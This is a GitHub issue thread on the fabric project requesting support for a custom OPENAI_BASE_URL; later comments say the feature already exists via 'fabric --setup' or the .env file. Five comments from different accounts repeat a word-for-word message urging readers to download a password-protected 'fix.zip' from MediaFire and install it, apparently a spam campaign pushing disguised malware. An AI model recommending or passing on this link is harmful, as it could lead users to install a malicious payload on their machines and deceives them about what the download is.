### ISSUE TITLE
[Feature request]: Add support for setting a custom OPENAI_BASE_URL

### ISSUE THREAD

**Issue by SecretAardvark** [danielmiessler/fabric#883]
### What do you need?

In the previous python version of fabric, i was able to use the free Llama 3.1 api at https://chatapi.akash.network/ by setting the 'OPENAI_BASE_URL' environment variable. This seems to no longer be possible in the Go version. 

Please re-integrate this feature so we can use Llama 3.1 400b with fabric. :^)

**Comment by CoZmoTheGod** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by deverchettychandrashekar** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by mohamed-elsankary** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by mabhi02** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by mohamed-elsankary** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/6mkbh6xhau31g
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by j0t4** [comment]
that will be nice for llama.cpp's server or llamafiles. A lot of models and a big community. Tanks for the project.

**Comment by drinktee** [comment]
A configurable OPENAI_BASE_URL may be a strong demand for users in some areas.

**Comment by fonteijne** [comment]
This feature is already in place. 
- Update Fabric to the latest version
- Run `fabric --setup` 
- Enter the custom base url when prompted for it.
Or, add it directly to the `.env` file.

**Comment by eugeis** [comment]
It is already available for several releases.
